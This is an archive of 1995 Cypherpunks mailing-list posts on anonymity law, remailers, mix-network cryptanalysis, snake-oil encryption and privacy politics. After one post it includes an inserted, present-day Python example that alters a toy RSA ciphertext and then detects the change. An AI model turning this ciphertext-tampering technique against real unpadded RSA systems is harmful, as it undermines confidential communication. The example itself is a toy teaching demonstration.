Message-ID: <199501220225.PAA01129@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:

>Nathan Zook wrote:
>
>> I believe, therefore, that both the court and the dissent bode poorly for
>> anonymous encrypted mail.
>
>But anonymous handbills are quite common, posted all over the place
>here in my home town, and the Supreme Court ruled quite properly that
>identities are not required for speech.

I too was concerned by the strong dissent in the anonymous handbill case
posted to the net, largely because I live in a country where we have
inherited the odious British practice of requiring newspapers and other
published material (such as handbills) to carry the name of the printer
and the sponsoring organisation (or sumpin' like that...). Its contemporary
significance is supposed to be as a control for defamation (yes, we still
have strong defamation laws -- good thing too, IMHO, and something crypto/
anonymity may or may not render moot): which is to say turning every
publisher and printer into a censor. [Even more bizarrely, the law requires
newspaper proprietors and editors to swear certain documents and deliver
them to the High Court every year...]

Of course, I have never heard of this particular piece of legislation being
invoked to prosecute someone who hasn't complied, and I've never heard of 
anyone complying. Nevertheless, it is on the books.

It seems to me that it would only take a minor amendment to the US law on
the identification of periodicals that are posted (notice the colophons [?]
in all those newspapers and magazines) to apply to all publications...
A couple of extra words in the definition section and away we go. (It's not
a freedom of speech issue, it's an environmental issue -- all those
handbills cluttering up the landfills... And it would only be fair to treat
the denizens of the information superhypeway equally...).

Things ain't half as safe as you might think.

D.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: davidm@iconz.co.nz (David Murray)
Date: Sat, 21 Jan 95 18:29:39 PST
To: Ben Goren <ben@Music.ASU.Edu>
Subject: Re: AA + Anonymous ECash = Unhappy Fundies
Message-ID: <199501220228.PAA01235@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain



>The "cause" will do much better if the first major association is made
>with something much less controversial. Girl Scout cookies, say. 

This may be what you are referring to, but there was a thread on alt.cp a
while back on introducing cyberspace to the people, and one of the
suggestions was a Web page to sell Girl Scout cookies.

Now if we could use anon-remailers and ecash to 'enhance' that idea, just
think of the mainstream publicity...

D.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Sun, 22 Jan 95 13:56:35 PST
To: lcottrell@popmail.ucsd.edu (Lance Cottrell)
Subject: Remailer background noise
In-Reply-To: <ab3f26ae01021004e8c7@[137.110.24.249]>
Message-ID: <xri8lKjqRCK0078yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi Lance,

I just set up a remailer at syrinx@c2.org. I think I remember that you were
somehow generating background noise for the remailers to minimize traffic
analysis. Could you please provide me with details?

Thanks,

Sam

--
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
   A man with one watch knows what time it is. A man with two is never sure.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 22 Jan 95 12:49:02 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: "Internetpol"
In-Reply-To: <199501222022.MAA14828@netcom7.netcom.com>
Message-ID: <9501222048.AA09932@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May says:
> Seriously, there is considerable danger that the growing chorus of
> alarmist nonsense about the Net being used for child porn, for snuff
> films, for weapons secrets deals, etc., will result in the U.S.
> Net.Cops linking up with their European and Asian associates.

I was rather amused at the forum given by the New York City Bar
Association on Clipper. The FBI representative not only trotted out
the four horsemen of the infocalypse -- in order, in a single
sentence! -- but also at one point spoke of snuff films.

He said, in what I found to be the greatest denial of logical thinking
I've seen in years, that he's not ready to give up and say that the
genie is out of the bottle -- as though he could put it back by force
of will.

I spoke with Stuart Baker for a while, during which time he informed
me that he didn't think the internet could possibly last.

> The recent stuff on "international key escrow," a la the conference
> last September, is worrisome.

Dorothy Denning is running another such conference soon.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: VACCINIA@UNCVX1.OIT.UNC.EDU
Date: Sun, 22 Jan 95 13:11:10 PST
To: cypherpunks@toad.com
Subject: Smoke & Mirrors
Message-ID: <01HM5ISQ2KTU004H2S@UNCVX1.OIT.UNC.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

A friend of mine has a business setting up networks for business's in the 
Baltimore area. He contracts out the security end of the setup to a firm
called "Smoke and Mirrors". They create firewalls and handle encryption
capabilities. I think the company is in the baltimore area, and was 
wondering if anyone on the list has heard of this company? With a name 
like smoke and mirrors I guess they better be good. Anybody know?

Vaccinia@uncvx1.oit.unc.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBLyLIZD2paOMjHHAhAQHIuwQAhMdaCsA5j7W/Z/m2VHLeaendI7/JHNGv
qm1hePuz3OolJmYgaWyAODlefcLkaKNapeEh5/xRoleEI8dUWuC+njJKvw6MKkr/
b6b/UbcKpLf/qqpFVuz+BbCnBUIY8iALhCLe832o5yxzAV2GT64Sj5gfjhUa3XVy
5dR4yI51SNc=
=ZvUV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 22 Jan 95 14:37:06 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: "Internetpol"
In-Reply-To: <Pine.3.89.9501221412.A8848-0100000@netcom10>
Message-ID: <9501222236.AA10096@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"James A. Donald" says:
> On Sun, 22 Jan 1995, Perry E. Metzger wrote:
> > I spoke with Stuart Baker for a while, during which time he informed
> > me that he didn't think the internet could possibly last
> 
> I find that most statists on the internet assume that the internet
> is some kind of government service.
> 
> When they discover that it is not, they wonder how it can possibly
> exist, and assume it will soon collapse.

I got the distinct impression that he didn't know that the internet
was in real use by big companies to conduct their daily affairs. When
I asked him if he'd ever heard of Cisco, he said he hadn't; he seemed
slightly surprised when I explained that it was a Fortune 500 company
that basically did nothing but sell internet routing equipment.

I don't know if the bastards are posing or are legitimately ignorant
but either way they are dangerous.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Sun, 22 Jan 95 17:51:22 PST
To: Mark Grant <mark@unicorn.com>
Subject: Re: T.A.Z. on Disk
In-Reply-To: <Pine.3.89.9501201432.A753-0100000@unicorn.com>
Message-ID: <Pine.3.89.9501221728.A1376-0100000@netcom22>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 20 Jan 1995, Angus Patterson wrote:
> 
> > I also saw another e-book site that had some more of [Bey's] stuff, can't
> > remember what it was though.
 
On Fri, 20 Jan 1995, Mark Grant wrote:
> There's some more on the WWW at http://www.uio.no/~mwatz/bey/index.html.

Bey sings the line that good is no different from evil, feeling
is better than thinking, and truth indistinguishable from lies.

Sounds like a pile of crap to me.  Still,  I suppose that feelings
and lies are a poet's job.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@scruznet.com>
Date: Sun, 22 Jan 95 18:04:30 PST
To: skaplin@mirage.skypoint.com>
Subject: RE: syrinx remailer up and running
Message-ID: <Chameleon.4.01.950122180415.jcorgan@jcorgan.sj.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain


>Well folks, the syrinx remailer is up and running now. The particulars:
>
>Address: syrinx@c2.org

Could you post the capabilities of this remailer, like cpunk, hash, pgp,
ksub, latent, etc.?

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@scruznet.com                    -Isaac Asimov






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Sun, 22 Jan 95 15:28:40 PST
To: carolb@barton.spring.com (Censored Girls Anonymous)
Subject: Re: Why emoney? Why not a web of debt?
In-Reply-To: <Pine.3.89.9501220904.B11359-0100000@barton.spring.com>
Message-ID: <m0rWBhy-0002GdC@forged.passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


> Many companies are already founded on "a web of debt".
> "Sallie Mae (Student Loans), Ginnie Mae (General Loans), and Freddie Mac
> (Real Estate Loans)," all come to mind at the moment. They're nicely
> formatted, processed and make even more money for investors as the
> interest rates change.

You are talking about trading mortgage-backed (and other debt-backed)
securities, and what you say can be generalized to bonds and certain
FX contracts as well.  Certainly derivatives often use debt instruments
in their formulation.
 
> So maybe the remailer IOU's, could be traded for the data haven IOU's,
> and so forth. I think someone does have a credit card IOU situation.
> The systems, and precedence for debt trading are there (and interest
> rates are going up again soon, indicated the Fed last week!).

This could work, but you are talking about securities markets, which
do this already.  Selling securities over remailers would be sure to
bring down the wrath of moneyed establishment types... :-)
 
> I just wonder who wants to play "collection agency"?

This is the problem.  Government always ends up playing this role,
and so it reserves the right to decide what it is willing to enforce...
classifying the rest as 'gambling' or some other unenforceable debt...

Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the Web
craig@passport.ca   416-778-6136  416-778-1965 FAX






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anthony Ortenzi <ortenzi@interactive.net>
Date: Sun, 22 Jan 95 15:40:35 PST
To: cypherpunks@toad.com
Subject: Re: Anti-porn conference in Manila
In-Reply-To: <gate.gV0cZc1w165w@dxm.ernet.in>
Message-ID: <Pine.BSI.3.91.950122183909.21084A-100000@ns.interactive.net>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 23 Jan 1995 rishab@dxm.ernet.in wrote:
> source of most European stuff, and bemoans the fact that too little is spent
> on monitoring traffic, as the war against drugs is considered more important.

What weenies... 

It's a nice metaphor to use, "monitoring traffic".  It sounds like such a 
harmless thing.  Funny how they don't use phrases like "invading 
privacy", "spying", and "searching without a warrant".

					-Anthony





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Sun, 22 Jan 95 19:19:21 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re:  traffic analyzing Chaum's digital mix
Message-ID: <199501230319.AA11008@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> From:          Hal <hfinney@shell.portal.com>
>
> I know that the Eurocrypt 89 proceedings had some articles on
> cryptanalyzing Chaum's mixes.  My library has an excellent crypto
> selection but is missing this volume.  Can anyone who has read this say
> whether there is anything in those papers that isn't obvious?

I found a copy of these proceedings in the library today.  There is a
paper titled "How to break the direct RSA-implementation of MIXes"
by Birgit Pfitzmann and Andreas Pfitzmann.
Here is its abstract:

MIXes are a means of untraceable communication based on a public key
cryptosystem as published by David Chaum in 1981 (CACM 24/2 84-88).
	In the case where RSA is used as this cryptosystem directly 
i.e. without composition with other functions (e.g. destroying the
multiplicative structure) we show how the resulting MIXes can be
broken by an active attack which is perfectly feasible in a typical
MIX-environment. 
	The attack does not affect the idea of MIXes as a whole: 
if the security requirements of [Chaum's paper] are concretized 
suitably and if a cryptosystem fulfills them one can implement secure 
MIXes directly.  However it shows that present security notions for
public key cryptosystems, which do not allow active attacks
do not suffice for a cryptosystem which is used to implement MIXes 
directly. 
	We also warn of the same attack and others on further 
possible implementations of MIXes and we mention several implementations
which are not broken by any attack we know.

My interpretation is that PGP-based remailers are not susceptible to
the attack described by this paper.  (Of course, they are currently 
vulnerable to much more trivial ones.)

Wei Dai


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyMeCTl0sXKgdnV5AQFoggP/XzBFSyChFgNMrX3gCQSNfOiwHrAEKgpD
a0TGYX9KBRqRd6cdDIdauDzFtPST1XjU/1RpYvlGjKIhOSd60JZwO+7185SJGBM9
q/4cqE/hOiHzB2gaoHiQFySDIkfFTeJdlIiTiS/OjbR5awkMCF+zU8cxPrgWTrxr
/sM1C39O8Cc=
=J20K
-----END PGP SIGNATURE-----
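
The abstract quoted above turns on the multiplicative structure of directly used RSA. The following is an added example, not code from the post or from the Pfitzmann paper: it shows that structure on a constructed toy key and how a redundancy check on the decrypted block rejects a ciphertext that was altered in transit. The key, the 8-byte payload format, the truncated SHA-256 tag and all function names are assumptions made for illustration; the tag stands in for "composition with other functions" and is not a vetted padding scheme.

```python
import hashlib
import hmac
from typing import Optional

# Constructed toy key built from two Mersenne primes. Far too small for real
# use; chosen only so the arithmetic runs instantly and offline.
P = 2**61 - 1
Q = 2**89 - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))  # private exponent (needs Python 3.8+)

PAYLOAD_LEN = 8   # bytes of payload per block (assumed format)
TAG_LEN = 8       # bytes of truncated SHA-256 kept as redundancy (assumed)
BLOCK_BITS = 8 * (PAYLOAD_LEN + TAG_LEN)


def raw_encrypt(m: int) -> int:
    """Direct ("textbook") RSA: no padding, no redundancy."""
    if not 0 <= m < N:
        raise ValueError("message out of range")
    return pow(m, E, N)


def raw_decrypt(c: int) -> int:
    """Direct RSA decryption: whatever comes out is accepted as the message."""
    return pow(c, D, N)


def scale_ciphertext(c: int, f: int) -> int:
    """Needs only the public key: E(m) * E(f) mod N equals E(m * f mod N)."""
    return (c * raw_encrypt(f)) % N


def seal(payload: bytes) -> int:
    """Encrypt payload || SHA-256(payload)[:TAG_LEN] as one RSA block."""
    if len(payload) != PAYLOAD_LEN:
        raise ValueError("payload must be exactly PAYLOAD_LEN bytes")
    tag = hashlib.sha256(payload).digest()[:TAG_LEN]
    return raw_encrypt(int.from_bytes(payload + tag, "big"))


def open_checked(c: int) -> Optional[bytes]:
    """Decrypt and return the payload only if the redundancy verifies."""
    m = raw_decrypt(c)
    if m >> BLOCK_BITS:
        return None  # decrypted value does not fit the block format
    block = m.to_bytes(PAYLOAD_LEN + TAG_LEN, "big")
    payload, tag = block[:PAYLOAD_LEN], block[PAYLOAD_LEN:]
    expected = hashlib.sha256(payload).digest()[:TAG_LEN]
    return payload if hmac.compare_digest(tag, expected) else None


if __name__ == "__main__":
    m = 123456789                      # constructed sample message
    c = raw_encrypt(m)
    altered = scale_ciphertext(c, 2)
    # Direct RSA accepts the altered ciphertext; its plaintext is 2*m mod N.
    print("raw decrypt of altered:", raw_decrypt(altered) == (2 * m) % N)

    sealed = seal(b"mix-hop1")         # constructed sample payload
    print("checked, untouched   :", open_checked(sealed))
    print("checked, altered     :", open_checked(scale_ciphertext(sealed, 2)))
```

Deployed systems get the same effect from hybrid encryption with a padded RSA block, which is how PGP uses RSA.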




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Sun, 22 Jan 95 16:58:55 PST
To: Harry Bartholomew <bart@netcom.com>
Subject: Call Security (Was: Re: TJOAUC 1-7)
In-Reply-To: <199501221133.DAA20304@netcom13.netcom.com>
Message-ID: <Pine.SUN.3.91.950122195349.24135E-100000@unix3.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Jan 1995, Harry Bartholomew wrote:

>  Call Security / Voice Crypto FAQ                     Neil Johnson

	This guy showed up in sci.crypt back in November of '94, with the 
"Call Security" program. It had some new unknown public-key algorithm in 
it that he had designed himself. He raved about the security of his 
program, and "Why wait for Voice PGP! Secure Voice is here now!". Just to 
show how secure his new algorithm was, he posted a challenge example, and 
asked for people to break it.

	Don Coppersmith posted the answer to the challenge the next
morning. It took thirty lines of Scheme code and about a minute on his
RS/6000. The only reason it took him so long to post it was that he saw 
the challenge at the start of work that day, and not when it was posted 
the night before. :-)

	Insert obligatory warning about snake-oil here.

Michael
--
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Sun, 22 Jan 95 19:08:15 PST
To: Johnathan Corgan <cypherpunks@toad.com
Subject: Re: syrinx remailer up and running
In-Reply-To: <Chameleon.4.01.950122180415.jcorgan@jcorgan.sj.scruznet.com>
Message-ID: <e9n8lKjqRWEK078yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Jan 95 18:02:18 PST, Johnathan Corgan <jcorgan@scruznet.com> wrote:
> (Johnathan Corgan uses PGP)
>
> >Well folks, the syrinx remailer is up and running now. The particulars:
> >
> >Address: syrinx@c2.org
>
> Could you post the capabilities of this remailer, like cpunk, hash, pgp,
> ksub, latent, etc.?

It's one of Sameer's remailers in a box. It's a modification of Hal Finney
and Eric Hughes' code. I believe it supports cpunk, hash and pgp. Here's a
copy of the readme file.

           The Cypherpunks Anonymous Remailer In a Box
                             Version 1.1
             Installer: Sameer <sameer@soda.berkeley.edu>
   Remailer: Eric Hughes & Hal Finney, with minor modifications by Sameer
-----------------------------------------------------------------------------

        This is the remailer in a box installation system. If you'd like
to install a remailer on your c2.org account, just run the install_remail
program found in /usr/local/lib/boxed-remailer.

        The anonymous remailer uses the .forward file to pipe all mail
to the remailer system. If mail to the remailer account is not acted
upon by the remailer software, it goes to wherever mail should go
based on what the .forward file said before the remailer was
installed.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

        Once the remailer is installed run the program "remailer_remove"
which will be installed in ~/bin if you'd like to remove the remailer.
(It's also in /usr/local/lib/boxed-remailer.)
infinity:lib/boxed-remailer 5:41pm [11] >

--
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
                Architecture is the art of how to waste space.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Acklin <hroller@metronet.com>
Date: Sun, 22 Jan 95 18:42:05 PST
To: cypherpunks@toad.com
Subject: hroller remailer up and running
In-Reply-To: <Chameleon.4.01.950122180415.jcorgan@jcorgan.sj.scruznet.com>
Message-ID: <Pine.HPP.3.90.950122203722.23988A-100000@fohnix.metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, I guess I can now say the same thing. A new Remailer is available 
at hroller@c2.org. It is Cpunk, PGP, Hash, Latent, and Cut, I believe. 
This is one of sameer's Remailer-In-A-Box and should be just about the 
same for all c2.org remailers. If you have any problems please report to 
the same address. Have all mail forwarded to my other account....


hroller





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: crawford@scruznet.com (Michael D. Crawford)
Date: Sun, 22 Jan 95 20:52:00 PST
To: cypherpunks@toad.com
Subject: $8M for National ID registry
Message-ID: <199501230451.UAA19990@scruz.net>
MIME-Version: 1.0
Content-Type: text/plain


"Anti-immigration bandwagon," San Francisco Examiner, Sunday, 11/22/95, p. A-5:

Amid an article discussing Clinton's effort to beat the Republicans in
keeping out illegal aliens:

"A federal advisory commission recently proposed that the government
establish a computerized register of the names and Social Security numbers
of citizens and aliens authorized to work in the United States, so that
employers could check the immigration status of job applicants."

"Clinton will seek $8.3 million for a pilot program to evaluate the
effectiveness of such a system."

Comforting words, especially given that children are to be assigned Social
Security numbers at birth.

Best Wishes,


Michael D. Crawford
crawford@scruznet.com
crawford@maxwell.ucsc.edu <- Finger me here for PGP Public Key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sun, 22 Jan 95 21:06:56 PST
To: CRSO.Cypherpunks@canrem.com
Subject: Re: LOCKSMITH'S GUILD WANTS L
In-Reply-To: <60.19259.6525.0C1CB25E@canrem.com>
Message-ID: <199501230505.VAA01141@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


David Lloyd-Jones wrote:

>  tcmay@netcom.com (Timothy C. May) sez:
>  
> TM+Crypto and remailers are going to do the same thing to today's
>   +versions of guilds, what we call "licensed professions."
>  
> I've got PGP, therefore I can be a brain surgeon?  Well, yeah, OK.  
> Pediatrician?  Hmmm.  'Nuther bad example.   Proctologist?  Sure.
> How 'bout dentist?
>  
> There's got to be one or two licensed professions you're not thinking 
> of...

I said nothing of the  kind about having PGP making one a brain
surgeon. Think about it.

Here are just a few more examples:

* Law. While anyone can offer free opinions, the U.S. does not allow
non-guild folks to charge money for such advice. And yet there are
many people well-qualified to sell legal advice (former lawyers,
disbarred lawyers, foreigners and those who haven't taken the requisite
bar exams, those who failed the bar exam for reasons other than
competency, etc.) I also know some just plain bright folks who have
read enough law to sell their advice in certain areas.

(By the way, the "well-qualified" qualifier should not be taken to
assume I believe some people should be able to sell advice and some
should not.)

(The government also regulates advertising, fees, etc.)

* Financial Advice, Accounting, etc. The "Certified Public Accountant"
and "Licensed Financial Advisor" stuff. 

* Geological. Structural. Architectural. All are areas where the
charging of money for services is regulated in some ways. In most
cases, the guild is that of "Professional Geologist," etc.

* Psychological Counselling. "Licensed Marriage, Family, and Child
Counselor" (LMFCC) is one of the guilds....others are Licensed Social
Worker (LSW) and, of course, M.D.s and Ph.D.s in various clinical
professions.

(Again, I make no claims that having PGP makes one a good
shrink--perhaps just the opposite. I do claim that a market may
develop for online psychological counselling, and that I know some
folks who would make better therapists than some licensed folks I know
(a former girlfriend of mine was an LMFCC). The law allows the LMFCCs
and LSWs to sell their services, and bars me from selling my therapy.)

And so on.

Again, I'm not claiming anything about PGP making conventional doctors
obsolete. Just the increased freedom of a wide range of services to be
negotiated electronically, without benefit of official guild
approvals.

(This is an actual concern the professional organizations have. They
worry about online medical diagnoses, about "unlicensed" consultants,
and about data bases over which they have no jurisdiction.)

I have many more of these points in my FAQ.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael  Conlen <meconlen@IntNet.net>
Date: Sun, 22 Jan 95 18:20:34 PST
To: Censored Girls Anonymous <carolb@barton.spring.com>
Subject: Re: Why emoney? Why not a web of debt?
In-Reply-To: <Pine.3.89.9501220904.B11359-0100000@barton.spring.com>
Message-ID: <Pine.SV4.3.91.950122210340.25763A-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 22 Jan 1995, Censored Girls Anonymous wrote:

> Many companies are already founded on "a web of debt".
> "Sallie Mae (Student Loans), Ginnie Mae (General Loans), and Freddie Mac
> (Real Estate Loans)," all come to mind at the moment. They're nicely
> formatted, processed and make even more money for investors as the
> interest rates change.

I for one would not want to go in to more debt. I am in debt up to my 
neck due to an auto accident. I can not afford to go in to more debt. I am 
barely making it because I owe on two loans, insurance, and money 
borrowed from relatives. This because I thought I could afford X dollars 
a month more. I could if I wasn't out of work for as long as I was. When 
I have everything paid off, I believe I will not be borrowing anything 
else for a while. My question to you is, "Why borrow, if 1. you can 
afford to pay cash now, and 2. when you are going to have to pay more in 
the long run."

							Groove on Dude
							Michael Conlen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Sun, 22 Jan 95 21:56:21 PST
To: cypherpunks@toad.com
Subject: A Legal Web Page Issue
Message-ID: <199501230555.VAA06569@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Someone on the Cyberia mailing list has announced that his URL on
legal matters (http://www.commlaw.com/pepper) can only be accessed by
sites which charge a "flat rate." I'm not at all clear what he means
by a flat rate here....is it flat rate per month, or per access, or
what?

In any case, I sent him (and the Cyberia list) a note saying I had
already added it to my home page and that the nature of the Web is
that URLs ripple out, either by linking with other pages or by
publicizing the URLs (as he did, and as I have just done here).

So, give it a browse and add it if you find it interesting. When he
sees a bunch of accesses (assuming his system has logs he can look at)
from sites over which he cannot possibly hope to set policy for, he
may realize the futility of this.

(He can stop accesses, or charge admission, with various means--maybe
not yet fully developed, or with commercial Web servers such as
Netscape is developing--but he cannot release the URL and then enforce
his ideas of who can access it. God forbid we have people trying to
"copyright" their URLs and then collect royalties anytime the URL
shows up in someone's list of interesting places.)

This experiment in guerilla ontology brought to you by,

--Tim May






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Sun, 22 Jan 95 19:06:55 PST
To: cypherpunks@toad.com
Subject: Re: T.A.Z. on Disk
Message-ID: <ab48ce040102100494fc@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


>On Fri, 20 Jan 1995, Angus Patterson wrote:
>>
>> > I also saw another e-book site that had some more of [Bey's] stuff, can't
>> > remember what it was though.
>
>On Fri, 20 Jan 1995, Mark Grant wrote:
>> There's some more on the WWW at http://www.uio.no/~mwatz/bey/index.html.
>
>Bey sings the line that good is no different from evil, feeling
>is better than thinking, and truth indistinguishable from lies.
>
>Sounds like a pile of crap to me.  Still,  I suppose that feelings
>and lies are a poet's job.

Hm. Can we maybe head off the Ideology War before it becomes unstoppable?
Cypherpunks write code, and do lots of other stuff too, but I'm hoping that
endless political wars is something cypherpunks don't do, or at least try
not to do on the cypherpunks list.

[It's possible that the ideology of the list is as homogenously
anarcho-capitalist as it seems, but I'd bet there's enough anarcho-others
to sustain several never-ending political 'discussions' of the sort that
will make the list even less useful than when we spent dozens of messages a
day talking about logos.]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 22 Jan 95 22:34:05 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: A Legal Web Page Issue
Message-ID: <v01510109ab48fd6442d9@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:55 PM 1/22/95, Timothy C. May wrote:
>Someone on the Cyberia mailing list has announced that his URL on
>legal matters (http://www.commlaw.com/pepper) can only be accessed by
>sites which charge a "flat rate." I'm not at all clear what he means
>by a flat rate here....is it flat rate per month, or per access, or
>what?
[...]
>So, give it a browse and add it if you find it interesting. When he
>sees a bunch of accesses (assuming his system has logs he can look at)
>from sites over which he cannot possibly hope to set policy for, he
>may realize the futility of this.
>
>(He can stop accesses, or charge admission, with various means--maybe
>not yet fully developed, or with commercial Web servers such as
>Netscape is developing--but he cannot release the URL and then enforce
>his ideas of who can access it. God forbid we have people trying to
>"copyright" their URLs and then collect royalties anytime the URL
>shows up in someone's list of interesting places.)

What a crazy thought. I will make sure to access his URL early and often.

BTW, what is your homepage URL? Or was that just a spoof?


-- Lucky Green <shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Sun, 22 Jan 95 22:39:58 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: www.commlaw.com/pepper page
Message-ID: <Pine.HPP.3.91.950122223214.27990A-100000@goshawk.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain


<p>
Copyright 1994 by Pepper & Corazzini, L.L.P.  All rights reserved.
Reproduction is permitted so long as no charge is made for copies, no copies
are placed on any electronic online service or database for which there is a
fee other than a flat access charge, there is no alteration and this
copyright notice is included.
<p>

legal translation:
don't charge money to access this or copies of this page 
UNLESS you charge for internet access and EVEN then, don't charge
extra just to look at this page.

didn't want to bring this to the list unless it's to kill this discussion
someone misread it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: david.lloyd-jones@canrem.com (David Lloyd-Jones)
Date: Sun, 22 Jan 95 20:31:05 PST
To: cypherpunks@toad.com
Subject: LOCKSMITH'S GUILD WANTS L
In-Reply-To: <199501211859.KAA12413@netcom7.netcom.com>
Message-ID: <60.19259.6525.0C1CB25E@canrem.com>
MIME-Version: 1.0
Content-Type: text/plain


 tcmay@netcom.com (Timothy C. May) sez:
 
TM+Crypto and remailers are going to do the same thing to today's
  +versions of guilds, what we call "licensed professions."
 
I've got PGP, therefore I can be a brain surgeon?  Well, yeah, OK.  
Pediatrician?  Hmmm.  'Nuther bad example.   Proctologist?  Sure.
How 'bout dentist?
 
There's got to be one or two licensed professions you're not thinking 
of...
 
                          -dlj.

david.lloyd-jones@canrem.com

 * 1st 1.11 #3818 * Aibohphobia: irrational fear of palindromes.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Sun, 22 Jan 95 20:23:53 PST
To: cypherpunks@toad.com
Subject: Re: port 25 forgeries
Message-ID: <9501230415.AA11561@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:35 PM 1/21/95 PST, santa@northpole.toad.com, org@toad.com wrote:
> ... 
